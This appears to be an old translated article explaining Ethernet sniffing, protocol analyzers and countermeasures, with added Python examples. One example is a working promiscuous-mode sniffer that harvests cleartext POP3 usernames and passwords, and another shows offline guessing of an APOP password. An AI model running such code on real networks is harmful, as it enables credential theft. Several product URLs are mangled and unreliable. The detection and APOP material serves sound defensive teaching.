Protocol analyzers.

Ethernet networks have gained immense popularity due to their good throughput, ease of installation, and affordable cost of network equipment.

However, Ethernet technology is not without significant drawbacks.

The main one is the insecurity of the transmitted information: a computer attached to an Ethernet network is able to intercept data addressed to its neighbours. The cause is the broadcast delivery mechanism on which Ethernet is built.

Local Broadcast

In an Ethernet-type network the attached computers typically share a single cable, which serves as the common medium for messages between them.

Anyone wishing to send over the shared channel must first make sure that the channel is idle at that moment (carrier sense).

Once a computer has begun transmitting, it keeps monitoring the signal on the cable to determine whether its frame has been corrupted by a collision with another computer that started transmitting at the same time (collision detection).

If a collision occurs, the transmission is aborted and the computer «goes silent» for a random back-off interval before trying again a little later.

A computer that is not transmitting anything itself nevertheless continues to «listen» to every message that neighbouring computers put on the cable.

On seeing its own address in the header of a received frame, the computer copies that frame into its local memory.

There are two main ways to connect computers into an Ethernet network.

In the first case the computers are chained together with coaxial cable.

The cable runs from computer to computer, attaching to each network adapter with a T-shaped connector. In professional terms this topology is an Ethernet 10Base2 network; it can equally be described as a network in which «everyone hears everyone else».

Any computer connected to the network is able to intercept data sent over this network by another computer.

In the second case each computer is connected by a twisted-pair cable to its own port on a central device: a hub or a switch.

Such networks are called Ethernet 10BaseT networks. In them the computers are divided into groups called collision domains.

A collision domain is the set of ports whose traffic is placed on one common bus. In a hub every port is internally joined to the same bus, so all stations attached to it form a single collision domain and each of them still hears every frame; a switch gives each port its own collision domain.

As a result, collisions occur not between all computers on the network but only between those that share a collision domain, which raises the throughput of the network as a whole.

More recently, large networks have begun to deploy a new class of switch that does not repeat every frame to every port and does not join groups of ports together.

Instead, each frame is buffered in the switch's memory and forwarded, as soon as the outgoing port is free, only towards the station it is addressed to. At the time of writing such networks are still rare: no more than 10% of all Ethernet-type networks.

Thus the data transmission algorithm used in the vast majority of Ethernet networks requires every computer on a segment to continuously «listen» to all traffic on that segment without exception.

Proposed access algorithms that would disconnect a computer from the medium while «foreign» messages are being transmitted were never implemented because of their excessive complexity and low efficiency.

The protocol analyzer as it is

The network adapter of each computer in an Ethernet network, as a rule, «hears» everything that its neighbors on the segment of this network «talk» about among themselves.

But it processes, and copies into local memory, only those portions of data (frames) whose destination address is the unique address assigned to the adapter, or a broadcast or multicast address it has been told to accept.

In addition, the vast majority of modern Ethernet adapters support a special mode called promiscuous mode, in which the adapter copies every frame seen on the wire into the computer's memory regardless of its destination address.

Specialized programs that put the network adapter into promiscuous mode and collect all network traffic for subsequent analysis are called protocol analyzers.

The latter are widely used by network administrators to monitor the operation of their networks and to identify overloaded segments that degrade data transfer rates.

Unfortunately, protocol analyzers are also used by intruders, who can use them to intercept other people's passwords and other confidential information.

It should be noted that protocol analyzers pose a serious danger. The very presence of a protocol analyzer in a network indicates a gap in its defences. It could have been installed by an outsider who penetrated the network from outside (for example, through the network's Internet connection).

But it could equally be the work of an insider who has legitimate access to the network. In either case the situation must be taken very seriously. Computer security experts classify attacks on computers using protocol analyzers as so-called second-level attacks.

This means that a computer hacker has already managed to penetrate the network's defenses and is now looking to build on his success. Using a protocol analyzer, he can try to intercept users' login names and passwords, their sensitive financial data (such as credit card numbers), and confidential communications (such as email).

Given sufficient resources, a computer hacker can, in principle, intercept all information transmitted over a network.

Protocol analyzers exist for every platform. But even if it turns out that one has not yet been written for a particular platform, the threat of an attack using a protocol analyzer still has to be taken into account.

The point is that protocol analyzers analyze protocols, not specific computers. A protocol analyzer can therefore «nest» on any node of the network and from there intercept the traffic that, thanks to broadcast delivery, reaches every computer on the segment.

Universities are the most common targets for attacks using protocol analyzers, if only because of the huge number of different logins and passwords that can be stolen in one go. Yet using a protocol analyzer in practice is not as easy as it may seem.

To benefit from a protocol analyzer, a hacker needs sufficient knowledge of networking technologies. It is not enough simply to install and run one: even in a small local network of five computers the traffic amounts to many thousands of packets per hour, so the analyzer's output would fill the «hard» disk «to the brim» in a short time.

That is why a hacker will typically configure the analyzer to capture only the first 200-300 bytes of each packet (the capture or «snap» length). The login exchange of protocols such as Telnet, FTP and POP takes place at the start of a session and within the first bytes of a packet's payload, right after the headers, so this short prefix is enough to harvest the usernames and passwords the hacker is most interested in.

However, if the hacker has enough space on the hard drive, then increasing the volume of traffic he intercepts will only benefit him and allow him to learn a lot of interesting things.
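The two ideas above, an adapter in promiscuous mode feeding every frame to a program, and a capture limited to the first few hundred bytes of each frame, are shown together in the following added example. It is written for this page and is not code from NetXRay, Lan Explorer or Network Monitor. It parses Ethernet/IPv4/TCP frames and pulls cleartext POP3 USER/PASS lines out of the first `snaplen` bytes; the addresses, interface name and POP3 session are constructed for the demonstration, and the live capture path is Linux-specific and needs CAP_NET_RAW.

```python
"""
Core of a protocol analyzer: parse an Ethernet/IPv4/TCP frame and pull
cleartext POP3 USER/PASS lines out of the first `snaplen` bytes.

Added example written for this page, not code from any product it names.
Addresses, interface name and the POP3 session are constructed.
"""
import socket
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

ETH_P_ALL = 0x0003          # Linux: hand the socket every ethertype
ETH_P_IP = 0x0800           # IPv4
IPPROTO_TCP = 6
POP3_PORT = 110
# Linux socket option constants (linux/if_packet.h)
SOL_PACKET, PACKET_ADD_MEMBERSHIP, PACKET_MR_PROMISC = 263, 1, 1


@dataclass
class Credential:
    src: str
    dst: str
    field: str      # "USER" or "PASS"
    value: str


def parse_frame(raw: bytes) -> Optional[Tuple[str, str, int, bytes]]:
    """Return (src_ip, dst_ip, dst_port, tcp_payload) for an IPv4/TCP frame,
    or None if the frame is something else or too short (e.g. truncated)."""
    if len(raw) < 14 or struct.unpack("!H", raw[12:14])[0] != ETH_P_IP:
        return None
    ip = raw[14:]
    if len(ip) < 20:
        return None
    ihl = (ip[0] & 0x0F) * 4                  # IPv4 header length in bytes
    if ip[9] != IPPROTO_TCP or len(ip) < ihl + 20:
        return None
    src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    tcp = ip[ihl:]
    dport = struct.unpack("!H", tcp[2:4])[0]
    doff = (tcp[12] >> 4) * 4                 # TCP header length in bytes
    return src, dst, dport, tcp[doff:]


def extract_pop3_credentials(raw: bytes, snaplen: int = 256) -> List[Credential]:
    """Look only at the first `snaplen` bytes of the frame, as the text describes:
    the login lines sit right at the start of the payload, so a short snap length
    still catches them while keeping the capture small."""
    parsed = parse_frame(raw[:snaplen])
    if parsed is None:
        return []
    src, dst, dport, payload = parsed
    if dport != POP3_PORT:
        return []
    found = []
    for line in payload.split(b"\r\n"):
        parts = line.split(b" ", 1)
        if len(parts) == 2 and parts[0] in (b"USER", b"PASS"):
            found.append(Credential(src, dst, parts[0].decode(),
                                    parts[1].decode("ascii", "replace")))
    return found


def build_frame(src: str, dst: str, dport: int, payload: bytes) -> bytes:
    """Constructed test frame (MACs arbitrary, checksums left zero; the parser
    never verifies them)."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", ETH_P_IP)
    tcp = struct.pack("!HHIIBBHHH", 40000, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0,
                     64, IPPROTO_TCP, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return eth + ip + tcp + payload


def open_promiscuous(ifname: str) -> socket.socket:
    """Linux only, needs CAP_NET_RAW: raw socket plus a PACKET_MR_PROMISC
    membership, which is exactly the «promiscuous mode» the text describes."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
    sock.bind((ifname, 0))
    # struct packet_mreq: int mr_ifindex; u16 mr_type; u16 mr_alen; u8 mr_address[8]
    mreq = struct.pack("iHH8s", socket.if_nametoindex(ifname), PACKET_MR_PROMISC, 0, bytes(8))
    sock.setsockopt(SOL_PACKET, PACKET_ADD_MEMBERSHIP, mreq)
    return sock


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:                    # python sniff.py eth0  (as root)
        sock = open_promiscuous(sys.argv[1])
        while True:
            for c in extract_pop3_credentials(sock.recv(65535)):
                print(f"{c.src} -> {c.dst}: {c.field} {c.value}")
    else:                                     # offline demo on a constructed frame
        demo = build_frame("10.0.0.5", "10.0.0.1", POP3_PORT, b"USER alice\r\nPASS hunter2\r\n")
        for c in extract_pop3_credentials(demo):
            print(f"{c.src} -> {c.dst}: {c.field} {c.value}")
```

Run without arguments it decodes the constructed frame offline; run as `sniff.py eth0` on Linux with root it opens the interface in promiscuous mode and reports every POP3 login it sees. Note that a snap length shorter than the Ethernet, IP and TCP headers (54 bytes here) makes `parse_frame` return None, which is the trade-off the text describes: the smaller the prefix kept, the less disk is used, but nothing past the cut is ever seen.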

There are many protocol analyzers available on Internet servers, differing only in their feature sets. Searching the softseek server for «protocol analyzer» and «sniffer» turns up a good dozen software packages.

For computers running Windows, some of the best protocol analyzers are Lan Explorer from Intellimax and NetXRay from Network Associates. NetXRay («network X-ray») has an extensive set of functions for taking a snapshot of the «insides» of an Ethernet network, determining which of its nodes and segments carry the greatest load, and compiling reports and charts from the data collected. A free version of NetXRay is available on the Internet at http://nai/asp_set/products/tnv/snitierbasicJntro.asp.

The Lan Explorer protocol analyzer («LAN Analyzer») is not inferior to NetXRay in functionality, has a very good user interface and is convenient and easy to use. A 15-day trial version of Lan Explorer is available at http://intellimax/ftpsites.htm.

The Network Monitor protocol analyzer is also included in the Windows NT Server operating system from Microsoft. To install it, double-click the Network icon in the Control Panel, then go to the Services tab, click the Add button, and select Network Monitor Tools and Agent in the dialog box that appears. After installation, the protocol analyzer can be launched from the Programs menu in the Administrative Tools section.

How to protect yourself from the protocol analyzer

Let's make one thing clear right away: advice on protecting against a protocol analyzer is needed only by those who want to fight back against hackers who use protocol analyzers to attack computer systems connected to a network. In the hands of a network administrator a protocol analyzer is a very useful tool that helps find and fix problems, remove bottlenecks that reduce throughput, and promptly detect hackers who have penetrated the network.

Here is some advice. First, try to obtain a network adapter that fundamentally cannot operate in promiscuous mode. Such adapters do exist. A minority lack promiscuous mode in hardware; the rest simply ship with a driver that does not expose the mode even though the hardware implements it. To find such an adapter, it is enough to ask the technical support service of any company that sells protocol analyzers which adapters their software does not work with.

Second, given that the PC99 specification drawn up by Microsoft and Intel requires every network card to support promiscuous mode, buy a modern intelligent switch that buffers each frame in memory and forwards it, where possible, only to the port of its addressee. An adapter then no longer has to «listen» to all traffic in order to pick out the frames meant for its own computer, and a passive sniffer on another port sees only broadcasts and its own traffic. Bear in mind that a switch is a mitigation, not a guarantee: an attacker on the same segment can still try to pull traffic through his machine (for instance by forging ARP replies), so switching should be combined with the measures below.
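Since, as the text notes, practically every adapter can be put into promiscuous mode, the practical check is whether one currently is. The following added example (written for this page, not taken from any of the products it names) shows the two traces promiscuous mode leaves on a Linux host: the IFF_PROMISC bit in `/sys/class/net/<interface>/flags` and the kernel message «device eth0 entered promiscuous mode» (with «left» when it is switched off). The flag values, log lines and interface names are constructed.

```python
"""
Detecting a sniffer on a Linux host. Promiscuous mode leaves two traces:
the IFF_PROMISC bit in /sys/class/net/<if>/flags, and a kernel log line
"device <if> entered promiscuous mode" (or "left" when it is turned off).

Added example written for this page; the flag values, log lines and
interface names below are constructed.
"""
import os
import re
from typing import Dict, Iterable, List

IFF_PROMISC = 0x100                       # linux/if.h
FLAGS_DIR = "/sys/class/net"
PROMISC_RE = re.compile(r"device (\S+) (entered|left) promiscuous mode")


def promisc_from_flags(flags: Dict[str, str]) -> List[str]:
    """flags maps interface name -> contents of its sysfs flags file (hex text
    such as '0x1103'). Returns the interfaces with IFF_PROMISC set."""
    return sorted(name for name, raw in flags.items() if int(raw, 16) & IFF_PROMISC)


def promisc_from_log(lines: Iterable[str]) -> Dict[str, bool]:
    """Replay kernel messages in order; the result is the final state of each
    interface that was ever switched (True = still promiscuous at the end)."""
    state: Dict[str, bool] = {}
    for line in lines:
        m = PROMISC_RE.search(line)
        if m:
            state[m.group(1)] = m.group(2) == "entered"
    return state


def read_sysfs_flags(base: str = FLAGS_DIR) -> Dict[str, str]:
    """Live read of every interface's flags file (no special privileges needed)."""
    out: Dict[str, str] = {}
    for name in os.listdir(base):
        try:
            with open(os.path.join(base, name, "flags")) as fh:
                out[name] = fh.read().strip()
        except OSError:
            continue
    return out


# Constructed sample data for the offline demo: eth0 is UP|BROADCAST|MULTICAST
# plus PROMISC, eth1 is the same without PROMISC, lo is UP|LOOPBACK.
SAMPLE_FLAGS = {"lo": "0x9", "eth0": "0x1103", "eth1": "0x1003"}
SAMPLE_LOG = [
    "Mar  3 10:21:07 host kernel: [  812.331] device eth0 entered promiscuous mode",
    "Mar  3 10:21:09 host kernel: [  814.102] device eth1 entered promiscuous mode",
    "Mar  3 10:25:40 host kernel: [ 1085.774] device eth1 left promiscuous mode",
]

if __name__ == "__main__":
    print("promiscuous (sysfs):", promisc_from_flags(SAMPLE_FLAGS))   # ['eth0']
    print("promiscuous (log):  ", promisc_from_log(SAMPLE_LOG))       # {'eth0': True, 'eth1': False}
    if os.path.isdir(FLAGS_DIR):
        print("this host:", promisc_from_flags(read_sysfs_flags()))
```

Both checks are local to the host being examined: they reveal a sniffer running on that machine, not one on a neighbouring computer, and a kernel-level rootkit can hide the flag. Watching the kernel log centrally is therefore the more robust of the two, because the «entered promiscuous mode» line is emitted at the moment the analyzer starts.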

Third, do not allow unauthorized installation of protocol analyzers on networked computers. Here you should use the tools from the arsenal used against software implants and, in particular, Trojan programs (installation of firewalls, control over what software is installed).

Fourth, encrypt all network traffic. There is a wide range of software packages that do this quite effectively and reliably. For example, mail passwords can be protected by an extension of the POP (Post Office Protocol) mail protocol: APOP (Authenticated POP). With APOP the client never sends the password itself; the server includes a unique timestamp in its greeting, and the client replies with an MD5 digest of that timestamp followed by the password. Because the digest differs in every session, a value captured with a protocol analyzer cannot simply be replayed. Two caveats apply: APOP protects only the login, not the mail that follows, and since the digest is a plain MD5 of the timestamp and password, an intruder who has captured one exchange can still guess the password offline, so weak passwords remain exposed. The other problem is that today not all mail servers and clients support APOP.
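The APOP exchange described above, as an added example written for this page (not from any mail product): the server's banner carries a per-connection timestamp, the client answers with MD5(timestamp + password), and the sniffer's view of the exchange is then used to show why replay fails but offline guessing of a weak password still works. The greeting, user name, password and host name are constructed.

```python
"""
APOP challenge-response (RFC 1939) as it appears on the wire, and what a
sniffer can and cannot do with it.

Added example written for this page; greeting, user, password and host
are constructed.
"""
import hashlib
import re
from typing import Iterable, Optional

TIMESTAMP_RE = re.compile(r"<[^<>]+>")


def make_greeting(pid: int, now: int, host: str) -> str:
    """Server side: +OK banner with a timestamp that is unique per connection."""
    return f"+OK POP3 server ready <{pid}.{now}@{host}>"


def greeting_timestamp(greeting: str) -> Optional[str]:
    """Pull the <...> token out of the banner; None means the server does not
    offer APOP and the client would fall back to cleartext USER/PASS."""
    m = TIMESTAMP_RE.search(greeting)
    return m.group(0) if m else None


def apop_digest(timestamp: str, password: str) -> str:
    """Client side: hex MD5 over the timestamp token followed by the shared
    secret. Only this digest crosses the network, never the password."""
    return hashlib.md5((timestamp + password).encode()).hexdigest()


def client_apop_line(greeting: str, user: str, password: str) -> Optional[str]:
    """The single command line the client sends in reply to the greeting."""
    ts = greeting_timestamp(greeting)
    return None if ts is None else f"APOP {user} {apop_digest(ts, password)}"


def offline_guess(captured_greeting: str, captured_apop: str,
                  wordlist: Iterable[str]) -> Optional[str]:
    """What a sniffer can still do. Replaying the digest is useless (the next
    session has a new timestamp), but the digest is plain MD5(timestamp +
    password), so every candidate can be checked offline against the capture."""
    ts = greeting_timestamp(captured_greeting)
    if ts is None:
        return None
    digest = captured_apop.split()[-1]
    for candidate in wordlist:
        if apop_digest(ts, candidate) == digest:
            return candidate
    return None


if __name__ == "__main__":
    g1 = make_greeting(1896, 697170952, "pop.example.net")
    g2 = make_greeting(1897, 697170990, "pop.example.net")
    print("S:", g1)
    print("C:", client_apop_line(g1, "alice", "hunter2"))
    # Same password, next session: different digest, so a replay is rejected.
    print("C (next session):", client_apop_line(g2, "alice", "hunter2"))
    # ...but one captured exchange plus a word list still gives up a weak password.
    captured = client_apop_line(g1, "alice", "hunter2")
    print("offline guess:", offline_guess(g1, captured, ["letmein", "hunter2"]))
```

The two printed APOP lines carry different digests for the same password, which is the replay protection the text describes; the last line shows that the captured pair (greeting, digest) is still enough to confirm a guessed password, which is why APOP should be paired with strong passwords or replaced by a fully encrypted session.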

Another product, Secure Shell, or SSH for short, was originally developed by the Finnish company SSH Communications Security (http://ssh.fi) and now has many implementations available free on the Internet. SSH is a protocol for carrying sessions and other traffic over a computer network in encrypted form.

Particularly well known are the software packages for protecting network data by encryption that are united by the abbreviation PGP, Pretty Good Privacy, in their names. Information about them can be found on the Internet at http://nai/asp_set/products/ins/intro.asp. Unfortunately, the freely distributed version of the encryption program available on that server is offered only to residents of the USA and Canada, and to those lucky Muscovites who happen to own pirated CDs on which it occasionally turns up.
